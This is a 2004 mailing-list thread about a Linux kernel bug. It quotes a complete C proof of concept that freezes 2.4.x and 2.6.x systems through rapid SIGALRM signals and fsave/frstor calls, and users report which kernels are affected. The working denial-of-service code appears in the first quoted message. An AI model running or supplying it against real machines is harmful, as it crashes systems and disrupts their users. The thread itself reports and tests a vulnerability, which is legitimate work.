Gustavo Chaín wrote:
>On Sat, 12 Jun 2004 14:14:56 -0400
>Gustavo Chaín <[EMAIL PROTECTED]> wrote:
>
>
>
>> The bug lets a simple C program lock up the system; it affects kernels
>> 2.4.2x and 2.6.x. The exploit was reported as a "gcc bug".
>>
>>Code
>>
>> #include <sys/time.h>
>> #include <signal.h>
>> #include <unistd.h>
>>
>> static void Handler(int ignore)
>> {
>>     char fpubuf[108];  /* holds the 108-byte x87 state image */
>>     __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
>>     write(2, "*", 1);
>>     __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
>> }
>>
>> int main(int argc, char *argv[])
>> {
>>     struct itimerval spec;
>>     signal(SIGALRM, Handler);
>>     /* deliver SIGALRM every 100 microseconds */
>>     spec.it_interval.tv_sec=0;
>>     spec.it_interval.tv_usec=100;
>>     spec.it_value.tv_sec=0;
>>     spec.it_value.tv_usec=100;
>>     setitimer(ITIMER_REAL, &spec, NULL);
>>     while(1)
>>         write(1, ".", 1);
>>
>>     return 0;
>> }
>>
>> The bug shows up if it is compiled with gcc versions 3.2 or 3.3
>>
>>The kernels that are safe...
>>
>>Here the code does nothing except raise a floating-point exception
>>error.
>>
>> * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
>> * Linux Kernel 2.6.4 SMP patched with staircase scheduler, Guille
>> * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
>> * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
>>
>>It is not very clear why the Gentoo patches for 2.4.26 kernels are safe
>>from this (they were released before the bug was published). According to the
>>article's author, he tested it and had no problems
>>
>>I assumed this bug was no serious threat before everyone I asked to test this
>>code confirmed that it did, in fact, freeze their systems. When I started
>>testing kernels I found that every kernel I tried, 2.4.xx and 2.6.xx, is
>>affected except the ones I had already installed on my system. Even Linux
>>2.4.26-gentoo-r1 crashes.
>>
>>blabla ...
>>
>>apparently the solution is to compile 2.4.25 and patch it with gentoo.
>>
>>pseudo-translated from:
>>http://www.todo-linux.com/go.php?pag=http://reviewed.homelinux.org/news/2004-06-11_kernel_crash/index.html.en
>>
>
>-_- ' it works
>
>
>
I tested it on a kernel with Debian patches, on the Unstable distribution,
version 2.4.26, and the system freezes completely.
From [EMAIL PROTECTED] Sat Jun 12 14:56:08 2004
From: [EMAIL PROTECTED] (Felipe Covarrubias Hooper)
Date: Sat Jun 12 15:01:25 2004
Subject: Kernel Crash-Exploit discovered
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
I tested it on a kernel with Debian patches, on the Unstable distribution,
kernel version 2.4.26, and the system freezes completely.
From [EMAIL PROTECTED] Sat Jun 12 15:20:52 2004
From: [EMAIL PROTECTED] (Gustavo Chaín)
Date: Sat Jun 12 15:21:09 2004
Subject: Kernel Crash-Exploit discovered
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
On Sat, 12 Jun 2004 14:56:08 -0400
Felipe Covarrubias Hooper <[EMAIL PROTECTED]> wrote:
> I tested it on a kernel with Debian patches, on the Unstable distribution,
> kernel version 2.4.26, and the system freezes completely.
>
but once it's frozen, then what? You reboot and everything is as if it had never happened?